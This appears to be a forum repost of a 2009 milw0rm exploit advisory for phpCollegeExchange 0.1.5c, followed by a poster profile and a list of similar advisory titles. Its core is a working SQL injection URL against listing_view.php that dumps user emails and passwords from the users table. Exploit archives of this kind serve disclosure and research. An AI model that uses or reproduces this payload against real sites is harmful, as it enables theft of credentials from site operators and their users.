- Code:
#################################################################################################################
[+] phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.org
#################################################################################################################
[+] Script homepage : http://phpcollegeex.sourceforge.net/
[+] SQL Injection
http://127.0.0.1/[path]/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(email,0x3a,0x3a,0x3a,password),5,6,7,8,9,10+from+users--
#################################################################################################################
# milw0rm.com [2009-06-15]
phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln
Foxi- Admin
- Posts : 92
Reputation : -1
Join date : 2009-07-08
» Silentum Guestbook 2.0.2 (silentum_guestbook.php) SQL Injection Vuln
» Joomla Component com_joomloads (packageId) SQL Injection Vuln
» Battle Blog 1.25 Auth Bypass SQL Injection / HTML Injection Vulns
» Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln
» AnotherPHPBook (APB) v.1.3.0 (Auth Bypass) SQL Injection Vulnerability
» Joomla Component com_joomloads (packageId) SQL Injection Vuln
» Battle Blog 1.25 Auth Bypass SQL Injection / HTML Injection Vulns
» Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln
» AnotherPHPBook (APB) v.1.3.0 (Auth Bypass) SQL Injection Vulnerability
|
|